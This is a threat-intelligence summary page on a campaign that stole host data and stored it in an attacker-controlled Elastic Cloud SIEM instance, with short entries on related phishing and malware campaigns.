Elastic Cloud SIEM stolen-data campaign
Campaign
Summary
Hide ▲
Show ▼
The Elastic Cloud SIEM abuse campaign has been uncovered across dozens of organizations, turning a legitimate security platform into a stolen-data hub and increasing operational risk. An unidentified threat actor exploited enterprise software flaws, including SolarWinds Web Help Desk, and used PowerShell to collect host data. The attacker funneled the stolen information into an attacker-controlled ElasticSearch index instead of relying on traditional C2 infrastructure. The activity affected at least 216 hosts across 34 Active Directory domains before the cloud instance was taken offline.
Related Happenings
Storm-2949 Microsoft 365 and Azure data-theft campaign
Campaign
First: 19.05.2026 22:35
Last: 19.05.2026 22:35
Sources 1
About this happening:
The **Storm-2949** campaign is targeting **Microsoft 365 and Azure production environments** to steal sensitive data, increasing the risk of privileged-account takeover and cloud...
Storm-2949 Microsoft 365 and Azure data-theft campaign
CampaignAbout this happening: The **Storm-2949** campaign is targeting **Microsoft 365 and Azure production environments** to steal sensitive data, increasing the risk of privileged-account takeover and cloud...
Storm-2561 SEO-poisoning VPN credential-theft campaign
Campaign
First: 13.03.2026 15:38
Last: 13.03.2026 15:38
Sources 1
About this happening:
The **Storm-2561** group is running a **credential-theft campaign** that uses **SEO poisoning** and fake **VPN clients** to steal **VPN credentials** from people searching for ent...
Storm-2561 SEO-poisoning VPN credential-theft campaign
CampaignAbout this happening: The **Storm-2561** group is running a **credential-theft campaign** that uses **SEO poisoning** and fake **VPN clients** to steal **VPN credentials** from people searching for ent...
Tycoon 2FA-Storm-1747 ecosystem shift changes threat-actor operations
Threat Actor Meta
First: 05.03.2026 08:51
Last: 05.03.2026 08:51
Sources 1
About this happening:
**Tycoon2FA** has evolved from a **subscription-based PhaaS** into a more resilient phishing service that now supports **device-code phishing** against **Microsoft 365** accounts....
Tycoon 2FA-Storm-1747 ecosystem shift changes threat-actor operations
Threat Actor MetaAbout this happening: **Tycoon2FA** has evolved from a **subscription-based PhaaS** into a more resilient phishing service that now supports **device-code phishing** against **Microsoft 365** accounts....
Latest development: 17.05.2026 17:43
eSentire says Tycoon2FA now uses device-code phishing to target Microsoft 365 accounts, with invoice-themed lure emails carrying Trustifi click-tracking URLs that redirect through Trustifi, Cloudflare Workers, obfuscated JavaScript layers, and a fake Microsoft CAPTCHA page before sending victims to microsoft.com/devicelogin. The kit also adds anti-analysis defenses, including detection of Selenium, Puppeteer, Playwright, and Burp Suite, plus blocks for security vendors, VPNs, sandboxes, AI crawlers, and cloud providers.
Atomic MacOS Stealer (AMOS) distribution through AI-app lures, SEO poisoning, and supply-chain abuse
Malware Activity
First: 12.02.2026 16:25
Last: 12.02.2026 16:25
Sources 1
About this happening:
**Atomic MacOS Stealer (AMOS)** is being distributed to **macOS users** through multiple delivery paths, including **fraudulent GitHub repositories**, **SEO poisoning**, **malvert...
Atomic MacOS Stealer (AMOS) distribution through AI-app lures, SEO poisoning, and supply-chain abuse
Malware ActivityAbout this happening: **Atomic MacOS Stealer (AMOS)** is being distributed to **macOS users** through multiple delivery paths, including **fraudulent GitHub repositories**, **SEO poisoning**, **malvert...
Publicly exposed training and demo apps in cloud environments are being abused at scale
Target Trend
First: 11.02.2026 13:30
Last: 11.02.2026 13:30
Sources 1
About this happening:
Publicly exposed **training and demo applications** are showing up at scale in **AWS, Azure, and GCP**, turning lab systems into real cloud footholds. Researchers verified **nearl...
Publicly exposed training and demo apps in cloud environments are being abused at scale
Target TrendAbout this happening: Publicly exposed **training and demo applications** are showing up at scale in **AWS, Azure, and GCP**, turning lab systems into real cloud footholds. Researchers verified **nearl...
Timeline
-
09.03.2026 17:45 1 articles · 2mo ago
Attacker creates Elastic Cloud SIEM data hub
Technical Analysis UpdateA threat actor created a free-trial Elastic Cloud SIEM deployment on January 28, 2026 and used encoded PowerShell on compromised systems across multiple organizations to collect operating system details, hardware specifications, Active Directory data, and installed patch information before sending the results to an ElasticSearch index named "systeminfo". Telemetry also showed repeated use of Kibana and administrative logins traced to a SAFING VPN tunnel.
Show sources
- Threat Actor Exploits Flaws and Uses Elastic Cloud SIEM to Manage Stolen Data — www.infosecurity-magazine.com — 09.03.2026 17:45
-
09.03.2026 17:45 2 articles · 2mo ago
Researchers disclose campaign scope and takedown
Initial DisclosureResearchers at Huntress disclosed that an unidentified threat actor had exploited flaws in enterprise software across the affected organizations, including SolarWinds Web Help Desk, to collect and analyze stolen data in a free-trial Elastic Cloud SIEM instance instead of using traditional C2 infrastructure. Recovered data showed at least 216 hosts across 34 Active Directory domains, and Huntress said it coordinated victim notification with Elastic and law enforcement before the cloud instance was taken offline.
Show sources
- Threat Actor Exploits Flaws and Uses Elastic Cloud SIEM to Manage Stolen Data — www.infosecurity-magazine.com — 09.03.2026 17:45
- Threat Actor Exploits Flaws and Uses Elastic Cloud SIEM to Manage Stolen Data — www.infosecurity-magazine.com — 09.03.2026 17:45